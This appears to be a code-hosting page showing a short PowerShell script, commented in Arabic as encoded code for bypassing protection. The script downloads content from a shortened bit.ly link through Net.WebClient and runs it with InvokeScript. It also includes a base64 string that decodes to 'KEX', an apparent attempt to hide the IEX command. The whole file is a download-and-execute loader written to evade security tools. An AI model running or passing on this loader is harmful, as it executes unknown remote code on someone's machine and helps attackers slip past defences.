This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # كود مشفر للالتفاف على الحماية | |
| $u = 'http://bit.ly/4ug96e0' | |
| $c = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('S0VY')) | |
| $w = New-Object Net.WebClient | |
| $s = $w.DownloadString($u) | |
| ExecutionContext.InvokeCommand.InvokeScript($s) |